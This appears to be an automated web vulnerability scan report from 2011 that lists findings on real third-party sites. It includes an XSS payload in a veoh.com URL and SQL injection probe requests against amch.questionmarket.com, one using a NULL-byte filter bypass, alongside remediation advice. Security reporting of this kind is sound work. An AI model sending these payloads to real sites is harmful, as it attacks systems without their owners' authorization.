23.103. http://www.inceptor.com/

23.104. http://www.jackpotcity.com/about-us.aspx

23.105. http://www.jackpotcity.com/js/jquery.hoverIntent.minified.js

23.106. http://www.kobobooks.com/

23.107. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863

23.108. http://www.milanoo.com/

23.109. http://www.myservicemonster.com/

23.110. http://www.oakland.edu/cdf/x22

23.111. http://www.opensource.org/licenses/mit-license.php

23.112. http://www.orgplus.com/x22

23.113. http://www.positioniseverything.net/abs_relbugs.html

23.114. http://www.positioniseverything.net/easyclearing.html

23.115. http://www.sfweekly.com/2010-08-11/news/ihelp-for-autism/

23.116. http://www.smartdevil.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

23.117. http://www.smartdevil.com/Resources/Shared/scripts/widgets.js

23.118. http://www.smartdevil.com/privacy.aspx

23.119. http://www.smartdevil.com/terms.aspx

23.120. https://www.smartdevil.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

23.121. https://www.smartdevil.com/Resources/Shared/scripts/widgets.js

23.122. https://www.smartdevil.com/privacy.aspx

23.123. https://www.smartdevil.com/terms.aspx

23.124. http://www.supermedia.com/help/web-hosting

23.125. http://www.supermedia.com/press

23.126. http://www.supermedia.com/press/

23.127. http://www.supermedia.com/trust/privacy-security

23.128. http://www.supermedia.com/trust/terms-of-use

23.129. https://www.supermedia.com/ecommerce/basic-ecommerce

23.130. https://www.supermedia.com/ecommerce/compare-ecommerce-options

23.131. https://www.supermedia.com/ecommerce/premium-ecommerce

23.132. https://www.supermedia.com/ecommerce/unlimited-ecommerce

23.133. https://www.supermedia.com/help/web-hosting

23.134. https://www.supermedia.com/press

23.135. https://www.supermedia.com/spportal/spportalFlow.do

23.136. https://www.supermedia.com/trust/privacy-security

23.137. https://www.supermedia.com/trust/terms-of-use

23.138. http://www.superpages.com/

23.139. http://www.superpages.com/superguarantee/

23.140. http://www.thefutoncritic.com/devwatch/wright-vs-wrong/x22

23.141. http://www.thumbshots.com/

23.142. http://www.thumbshots.com/Community.aspx

23.143. http://www.thumbshots.com/Community/Feedback.aspx

23.144. http://www.thumbshots.com/Community/SuccessStories.aspx

23.145. http://www.thumbshots.com/Home.aspx

23.146. http://www.thumbshots.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

23.147. http://www.thumbshots.com/Resources/Shared/scripts/widgets.js

23.148. http://www.thumbshots.com/Support.aspx

23.149. http://www.thumbshots.com/default.aspx

23.150. http://www.thumbshots.com/privacy.aspx

23.151. http://www.thumbshots.com/terms.aspx

23.152. http://www.tucows.com/advertise.html

23.153. http://www.tucows.com/affiliate/index.html

23.154. http://www.tucows.com/contact.html

23.155. http://www.veoh.com/

23.156. http://www.veoh.com/browse/groups

23.157. http://www.veoh.com/browse/groups/

23.158. http://www.veoh.com/browse/movies

23.159. http://www.veoh.com/browse/movies/

23.160. http://www.veoh.com/browse/music

23.161. http://www.veoh.com/browse/music/

23.162. http://www.veoh.com/browse/tvshows

23.163. http://www.veoh.com/browse/tvshows/

23.164. http://www.veoh.com/browse/videos

23.165. http://www.veoh.com/browse/videos/category/action_adventure

23.166. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18647177dJ8p2YBE

23.167. http://www.veoh.com/browse/videos/category/action_adventure/watch/v189741093prNNZM5

23.168. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8

23.169. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x22

23.170. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

23.171. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN

23.172. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC

23.173. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA

23.174. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N

23.175. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8

23.176. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt

23.177. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20756872Ta2Y7sDB

23.178. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20757961gnh48zmS

23.179. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20758438BTte3QQz

23.180. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr

23.181. http://www.veoh.com/browse/videos/category/action_adventure4957f

23.182. http://www.veoh.com/browse/videos/category/action_adventure4957f">b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('')

23.183. http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/a

23.184. http://www.veoh.com/browse/videos/category/animation/watch/v20767083WdnCj7gW

23.185. http://www.veoh.com/browse/videos/category/celebrity_and_showbiz/watch/v20767641DYmkkC9T

23.186. http://www.veoh.com/browse/videos/category/educational_and_howto/watch/v20767155HXCcYkcJ

23.187. http://www.veoh.com/browse/videos/category/entertainment/watch/v20767324YkGXZzfQ

23.188. http://www.veoh.com/browse/videos/category/people_and_blogs/watch/v20767178Fn5bZQJP

23.189. http://www.veoh.com/browse/webseries

23.190. http://www.veoh.com/browse/webseries/

23.191. http://www.veoh.com/browse/webseries/featured/1

23.192. http://www.veoh.com/bulletin

23.193. http://www.veoh.com/collection/Veoh-Editor-Picks

23.194. http://www.veoh.com/corporate/aboutus

23.195. http://www.veoh.com/corporate/copyright

23.196. http://www.veoh.com/corporate/pressroom

23.197. http://www.veoh.com/corporate/privacypolicy

23.198. http://www.veoh.com/corporate/termsofuse

23.199. http://www.veoh.com/download

23.200. http://www.veoh.com/download/index/permalinkId/v18978294NGnK88j8

23.201. http://www.veoh.com/faq

23.202. http://www.veoh.com/favorites

23.203. http://www.veoh.com/help

23.204. http://www.veoh.com/login

23.205. http://www.veoh.com/messages/inbox

23.206. http://www.veoh.com/metrics/logadevent

23.207. http://www.veoh.com/myinterests

23.208. http://www.veoh.com/myplaylists

23.209. http://www.veoh.com/myprofile/videos

23.210. http://www.veoh.com/publish/video

23.211. http://www.veoh.com/register

23.212. http://www.veoh.com/search/videos/q/-MENUVALUE-

23.213. http://www.veoh.com/search/videos/q/publisher:bunny12344

23.214. http://www.veoh.com/support.html

23.215. http://www.veoh.com/users/JDFox5

23.216. http://www.veoh.com/users/MitchRider

23.217. http://www.veoh.com/users/Veoh-Action-Anime

23.218. http://www.veoh.com/users/Veoh-Horror-Movies

23.219. http://www.veoh.com/users/Veoh-Upcoming-Movies

23.220. http://www.veoh.com/users/bunny12344

23.221. http://www.veoh.com/users/tonysurfs

23.222. http://www.veoh.com/veohtv

23.223. http://www.veoh.com/video/conduit

23.224. http://www.veoh.com/video/flag/permalinkId/v18978294NGnK88j8

23.225. http://www.veoh.com/video/share/permalinkId/v18978294NGnK88j8

23.226. http://www.w3.org/TR/html4/loose.dtd

23.227. http://www.waspbarcode.com/scanners/

24. Private IP addresses disclosed

24.1. http://cdn.gigya.com/JS/gigya.js

24.2. http://digg.com/submit

24.3. http://digg.com/submit

24.4. http://digg.com/submit

24.5. http://download.cnet.com/SmartDraw-2010/3000-2075_4-10002466.html/x22

25. Credit card numbers disclosed

26. Robots.txt file

26.1. http://a.abc.com/service/gremlin/css/files/register-loader,abc-community.css

26.2. http://ads.gmodules.com/gadgets/ifr

26.3. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030885431/

26.4. http://ll.static.abc.com/m/vp/prod/images/nav/navbg.png

26.5. http://store.apple.com/us

26.6. https://store.apple.com/Apple/WebObjects/OrderStatus.woa

26.7. http://superpages.122.2o7.net/b/ss/superpagesadvert/1/H.14/s07964217748958

26.8. http://uat.netmng.com/pixel/

26.9. http://www.apple.com/

26.10. http://www.googleadservices.com/pagead/conversion/1030885431/

26.11. http://www.supermedia.com/support/contact-us/company

26.12. https://www.supermedia.com/spportal/style/form.css

27. Cacheable HTTPS response

27.1. https://accounts.brightcove.com/en/terms-and-conditions/.

27.2. https://appleid.apple.com/cgi-bin/WebObjects/MyAppleId.woa

27.3. https://author.tucows.com/

27.4. https://bugzilla.mozilla.org/show_bug.cgi

27.5. https://buy.itunes.apple.com/WebObjects/MZFinance.woa/wa/redeemLandingPage

27.6. https://chat.teamsalesagent.com/tsa/JS/direct_619.html

27.7. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

27.8. https://i.spin3.com/jackpotcity/en/web/

27.9. https://iforgot.apple.com/cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.17.11.3.1

27.10. https://iforgot.apple.com/cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.17.5

27.11. https://iforgot.apple.com/cgi-bin/WebObjects/DSiForgot.woa/134/wo/3xyYPhJSmD1Fcb86H5Gepg/0.11.4.1.1.3.3.7.1.5

27.12. https://iforgot.apple.com/favicon.ico

27.13. https://mktws.apple.com/acdws/notify.js

27.14. https://ssl.apple.com/global/metrics/us/us.myinfo.metrics.html

27.15. https://store.apple.com/Catalog/US/Images/ordernumberinfo.html

27.16. https://www.securecheckout.billmelater.com/paycapture-content/fetch

27.17. https://www.smartdevil.com/

27.18. https://www.smartdevil.com/Home.aspx

27.19. https://www.smartdevil.com/SSLLogin.aspx

27.20. https://www.smartdevil.com/SSLLogin/tabid/116/Default.aspx

27.21. https://www.smartdevil.com/SSLLogin/tabid/116/ctl/SendPassword/Default.aspx

27.22. https://www.smartdevil.com/ScriptResource.axd

27.23. https://www.smartdevil.com/WebResource.axd

27.24. https://www.smartdevil.com/privacy.aspx

27.25. https://www.smartdevil.com/terms.aspx

27.26. https://www.supermedia.com/

27.27. https://www.supermedia.com/about-us

27.28. https://www.supermedia.com/about-us/corporate-profile

27.29. https://www.supermedia.com/about-us/executive-team

27.30. https://www.supermedia.com/about-us/our-clients

27.31. https://www.supermedia.com/advertising-goals

27.32. https://www.supermedia.com/business-listings

27.33. https://www.supermedia.com/business-listings/coupons

27.34. https://www.supermedia.com/business-listings/listing-enhancements-packages

27.35. https://www.supermedia.com/careers

27.36. https://www.supermedia.com/careers/compensation-benefits

27.37. https://www.supermedia.com/careers/core-values

27.38. https://www.supermedia.com/careers/employees-retirees

27.39. https://www.supermedia.com/careers/job-search

27.40. https://www.supermedia.com/careers/professional-development

27.41. https://www.supermedia.com/client-solutions

27.42. https://www.supermedia.com/client-solutions/client-stories

27.43. https://www.supermedia.com/client-solutions/local-retail

27.44. https://www.supermedia.com/client-solutions/local-service

27.45. https://www.supermedia.com/client-solutions/national-brand-agencies

27.46. https://www.supermedia.com/client-solutions/share-the-wealth

27.47. https://www.supermedia.com/client-solutions/web-based-business

27.48. https://www.supermedia.com/community/barter-network

27.49. https://www.supermedia.com/community/newsletter

27.50. https://www.supermedia.com/direct-mail

27.51. https://www.supermedia.com/direct-mail/call-tracking

27.52. https://www.supermedia.com/direct-mail/compare-direct-mail-options

27.53. https://www.supermedia.com/direct-mail/postcards

27.54. https://www.supermedia.com/direct-mail/shared-card-packs

27.55. https://www.supermedia.com/directory-options

27.56. https://www.supermedia.com/domain-names

27.57. https://www.supermedia.com/ecommerce

27.58. https://www.supermedia.com/ecommerce/basic-ecommerce

27.59. https://www.supermedia.com/ecommerce/compare-ecommerce-options

27.60. https://www.supermedia.com/ecommerce/getting-started

27.61. https://www.supermedia.com/ecommerce/premium-ecommerce

27.62. https://www.supermedia.com/ecommerce/unlimited-ecommerce

27.63. https://www.supermedia.com/help

27.64. https://www.supermedia.com/help/account-information

27.65. https://www.supermedia.com/help/account-information/sign-in

27.66. https://www.supermedia.com/help/business-listings

27.67. https://www.supermedia.com/help/direct-mail

27.68. https://www.supermedia.com/help/domains-email

27.69. https://www.supermedia.com/help/local-search-marketing

27.70. https://www.supermedia.com/help/online-stores

27.71. https://www.supermedia.com/help/search-marketing-services

27.72. https://www.supermedia.com/help/search-marketing-services/reporting

27.73. https://www.supermedia.com/help/telephone-service

27.74. https://www.supermedia.com/help/terms-conditions

27.75. https://www.supermedia.com/help/web-hosting

27.76. https://www.supermedia.com/help/web-site-design

27.77. https://www.supermedia.com/help/yellow-pages

27.78. https://www.supermedia.com/local-search-marketing/do-it-yourself

27.79. https://www.supermedia.com/local-search-marketing/services

27.80. https://www.supermedia.com/marketing-success

27.81. https://www.supermedia.com/media-network/affiliate-program

27.82. https://www.supermedia.com/media-network/market-coverage

27.83. https://www.supermedia.com/media-network/mobile

27.84. https://www.supermedia.com/media-network/online-ad-network

27.85. https://www.supermedia.com/media-network/our-brands

27.86. https://www.supermedia.com/media-network/sem-partners

27.87. https://www.supermedia.com/national-agency-products/media-kit

27.88. https://www.supermedia.com/online-advertising

27.89. https://www.supermedia.com/packaged-solutions

27.90. https://www.supermedia.com/packaged-solutions/auto-dealer-packages

27.91. https://www.supermedia.com/packaged-solutions/business-profile-packages

27.92. https://www.supermedia.com/packaged-solutions/multi-product-packages

27.93. https://www.supermedia.com/press

27.94. https://www.supermedia.com/print-advertising/white-pages

27.95. https://www.supermedia.com/print-advertising/yellow-pages

27.96. https://www.supermedia.com/reputation-monitoring

27.97. https://www.supermedia.com/social-responsibility

27.98. https://www.supermedia.com/spportal/

27.99. https://www.supermedia.com/spportal/404.jsp

27.100. https://www.supermedia.com/spportal/landingpages.do

27.101. https://www.supermedia.com/superguarantee/join

27.102. https://www.supermedia.com/support/contact-us

27.103. https://www.supermedia.com/support/site-map

27.104. https://www.supermedia.com/trust/privacy-security

27.105. https://www.supermedia.com/trust/social-media-content-disclaimer

27.106. https://www.supermedia.com/trust/terms-of-use

27.107. https://www.supermedia.com/video-ads

27.108. https://www.supermedia.com/web-design

27.109. https://www.supermedia.com/web-hosting

27.110. https://www.supermedia.com/web-sites

27.111. https://www.thumbshots.com/Products/ThumbshotsImages/IntegrationCode.aspx

28. Multiple content types specified

28.1. http://ll-appserver.veoh.com/scripts/veoh.js

28.2. http://sr2.liveperson.net/visitor/addons/deploy.asp

29. HTML does not specify charset

29.1. http://2e76.v.fwmrm.net/

29.2. http://abcnews.go.com/Sports/wireStory

29.3. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23

29.4. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.24

29.5. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4

29.6. http://ad.doubleclick.net/adi/lb.buzzillions/

29.7. http://adcontent.videoegg.com/alternates/tucows_alt_300x250.html

29.8. http://adcontent.videoegg.com/alternates/tucows_default_728x90.html

29.9. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1443976/0/0/ADTECH

29.10. http://blog.supermedia.com/comment_form.php

29.11. http://blog.supermedia.com/comment_html.php

29.12. http://c.brightcove.com/services/messagebroker/amf

29.13. https://cbi.boldchat.com/favicon.ico

29.14. http://cdn.unicast.msn.com/script/V3.00/deliver2.html

29.15. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_0.html

29.16. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_1.html

29.17. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_10.html

29.18. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_2.html

29.19. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_3.html

29.20. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_4.html

29.21. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_5.html

29.22. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_6.html

29.23. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_7.html

29.24. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_8.html

29.25. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_9.html

29.26. http://cdn1.trafficmp.com/prod/ig/110121-160940_ig.html

29.27. http://core.videoegg.com/eap/12368/html/jstags.html

29.28. http://fearthedevil.com/x22

29.29. http://fls.doubleclick.net/activityi

29.30. http://jqueryui.com/about

29.31. http://jqueryui.com/themeroller/

29.32. http://managedq.com/search.php

29.33. http://sales.liveperson.net/visitor/liveperson/chat-button/

29.34. http://sr2.liveperson.net/visitor/addons/deploy.asp

29.35. https://store.apple.com/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.1.5.3.1.0.0

29.36. https://store.apple.com/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.13

29.37. https://store.apple.com/Catalog/US/Images/ordernumberinfo.html

29.38. http://telecommunications.jobs.net/Michigan.htm/x22

29.39. https://redcated/iaction/00asup_RetargetingSecure_1

29.40. https://redcated/iaction/00asup_SigninbuttonPage_10

29.41. http://www.city-data.com/zips/48083.html/x22

29.42. http://www.expertrating.com/

29.43. http://www.facebook.com/share.php

29.44. http://www.forlocations.com/

29.45. http://www.jobs.net/Michigan.htm/x26amp

29.46. http://www.lights.ca/publisher/db/2/5952.html/x22

29.47. http://www.lwis.net/

29.48. http://www.thesfmarathon.com/wp-content/plugins/forum-server/fs-admin/wpf-usergroup-edit.php

29.49. http://www.tucows.com/videoegg/ad.html

29.50. http://www.wugnet.com/shareware/spow.asp

30. HTML uses unrecognised charset

30.1. http://store.apple.com/Catalog/US/Images/intlstoreroutingpage.html

30.2. http://www.made-in-china.com/

31. Content type incorrectly stated

31.1. http://2e76.v.fwmrm.net/

31.2. http://abc.go.com/favicon.ico

31.3. http://ads.adap.tv/beacons

31.4. http://ads.gmodules.com/gadgets/makeRequest

31.5. http://adserver.adtechus.com/adrawdata/3.0/5108.1/1443976/0/0/ADTECH

31.6. http://amch.questionmarket.com/adsc/d647401/46/794570/randm.js

31.7. http://amch.questionmarket.com/adsc/d647401/46/799689/randm.js

31.8. http://amch.questionmarket.com/adsc/d724324/16/726813/randm.js

31.9. http://amch.questionmarket.com/adsc/d724324/16/752263/randm.js

31.10. http://amch.questionmarket.com/adsc/d724324/16/752264/randm.js

31.11. http://amch.questionmarket.com/adsc/d724324/16/752265/randm.js

31.12. http://amch.questionmarket.com/adsc/d724324/16/752266/randm.js

31.13. http://amch.questionmarket.com/adsc/d724324/27/726813/randm.js

31.14. http://amch.questionmarket.com/adsc/d724324/27/752266/randm.js

31.15. http://amch.questionmarket.com/adsc/d724324/27/752268/randm.js

31.16. http://amch.questionmarket.com/adsc/d724324/27/752269/randm.js

31.17. http://amch.questionmarket.com/adsc/d724324/27/752289/randm.js

31.18. http://amch.questionmarket.com/adsc/d747416/11/748729/randm.js

31.19. http://amch.questionmarket.com/adsc/d747416/11/755589/randm.js

31.20. http://amch.questionmarket.com/adsc/d747416/11/755592/randm.js

31.21. http://amch.questionmarket.com/adsc/d763769/11/770950/randm.js

31.22. http://amch.questionmarket.com/adsc/d763769/11/775951/randm.js

31.23. http://amch.questionmarket.com/adsc/d793570/3/793590/randm.js

31.24. http://amch.questionmarket.com/adsc/d793570/3/793591/randm.js

31.25. http://amch.questionmarket.com/adsc/d798609/10/805369/randm.js

31.26. http://amch.questionmarket.com/adsc/d798609/10/805370/randm.js

31.27. http://api.veoh.com/crossdomain.xml

31.28. http://app.scanscout.com/ssframework/adStreamJSController.htm

31.29. http://app.scanscout.com/ssframework/adStreamJSController.xml

31.30. http://as1.suitesmart.com/

31.31. http://beacon.videoegg.com/

31.32. http://beacon.videoegg.com/adpo

31.33. http://beacon.videoegg.com/amcload

31.34. http://beacon.videoegg.com/demo

31.35. http://beacon.videoegg.com/echo

31.36. http://beacon.videoegg.com/initjs

31.37. http://beacon.videoegg.com/invpos

31.38. http://blog.supermedia.com/comment_form.php

31.39. http://cdn.gigya.com/js/gigya.services.socialize.plugins.simpleshare.min.js

31.40. http://cdn.taboolasyndication.com/libtrc/veoh/rbox.en.4-6-1-43135.json

31.41. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_0.html

31.42. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_1.html

31.43. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_10.html

31.44. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_2.html

31.45. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_3.html

31.46. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_4.html

31.47. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_5.html

31.48. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_6.html

31.49. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_7.html

31.50. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_8.html

31.51. http://cdn1.trafficmp.com/prod/ig/110121-160940_adv_9.html

31.52. http://content.scanscout.com/ssframework/dt/dl_0.js

31.53. http://core.videoegg.com/eap/

31.54. http://core.videoegg.com/sites/

31.55. http://core.videoegg.com/sites/advertise.tucows.com.js

31.56. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

31.57. http://goku.brightcove.com/1pix.gif

31.58. https://iforgot.apple.com/favicon.ico

31.59. http://images.apple.com/global/nav/scripts/globalnav.js

31.60. http://ir.supermedia.com/common/images/icon_share.gif

31.61. http://ir.supermedia.com/common/mobile/

31.62. http://l0.scanscout.com/ssframework/logController.xml

31.63. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

31.64. https://mktws.apple.com/acdws/notify.js

31.65. https://mktws.apple.com/acdwsweb/ACDwsAction.do

31.66. http://mobile.jackpotcity.com/controls/captcha.aspx

31.67. http://my.supermedia.com/includes/captcha/index.jsp

31.68. http://rad.msn.com/ADSAdClient31.dll

31.69. http://sr2.liveperson.net/hcp/html/mTag.js

31.70. http://sr2.liveperson.net/visitor/addons/deploy.asp

31.71. https://store.apple.com/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.1.5.3.1.0.0

31.72. https://store.apple.com/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.13

31.73. http://storeimages.apple.com/1806/store.apple.com/rs/css/i/aos/cart/cart-options-print.gif

31.74. http://trc.taboolasyndication.com/dispatch/

31.75. http://trc.taboolasyndication.com/favicon.ico

31.76. http://video.od.visiblemeasures.com/log

31.77. http://videos.smartdesis.com/12948/watch-robo-telugu-movie-online/x22

31.78. http://videos.smartdesis.com/12962/watch-mahesh-khaleja-movie-online-tc-rip/x22

31.79. http://videos.smartdesis.com/13039/watch-ntrs-brindavanam-movie-online-tc-rip/x22

31.80. http://videos.smartdesis.com/13201/watch-rakht-charitra-2-movie-online/x22

31.81. http://videos.smartdesis.com/hindi-online-movies-index/x22

31.82. http://videos.smartdesis.com/page/2/x22

31.83. http://videos.smartdesis.com/tamil-online-movies-index/x22

31.84. http://videos.smartdesis.com/telugu-online-movies-index-a/x22

31.85. http://videos.smartdesis.com/x22

31.86. http://www.buzzillions.com/favicon.ico

31.87. http://www.facebook.com/extern/login_status.php

31.88. http://www.kminek.pl/bsdlicense.txt

31.89. http://www.sustainabilitycoalition.org/wp-content/plugins/forum-server/fs-admin/error_log

31.90. http://www.thesfmarathon.com/wp-content/plugins/forum-server/fs-admin/wpf-usergroup-edit.php

31.91. http://www.thumbshots.com/portals/0/Flash/BannerRotator/images.xml

31.92. http://www.w3.org/2006/04/ttaf1

31.93. http://www.w3.org/TR/html4/loose.dtd

32. Content type is not specified

32.1. http://ad.trafficmp.com/a/js

32.2. http://load.tubemogul.com/core

32.3. http://store.apple.com/us/cartx/save

33. SSL certificate

33.1. https://store.apple.com/

33.2. https://www.supermedia.com/



1. SQL injection  next
There are 25 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://amch.questionmarket.com/adsc/d647401/46/799689/randm.js [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d647401/46/799689/randm.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adsc'/d647401/46/799689/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:42 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc''/d647401/46/799689/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:42 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 231
Keep-Alive: timeout=120, max=903
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc''/d647401/46/799689/randm.js was not found on t
...[SNIP]...

1.2. http://amch.questionmarket.com/adsc/d724324/16/752264/randm.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d724324/16/752264/randm.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adsc/d724324/16/752264/randm.js%00' HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:31 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059


<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc/d724324/16/752264/randm.js%00'' HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 21:48:24 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 318
Keep-Alive: timeout=120, max=709
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc/d724324/16/752264/randm.js was not found on thi
...[SNIP]...

1.3. http://amch.questionmarket.com/adsc/d724324/27/726813/randm.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://amch.questionmarket.com
Path:   /adsc/d724324/27/726813/randm.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

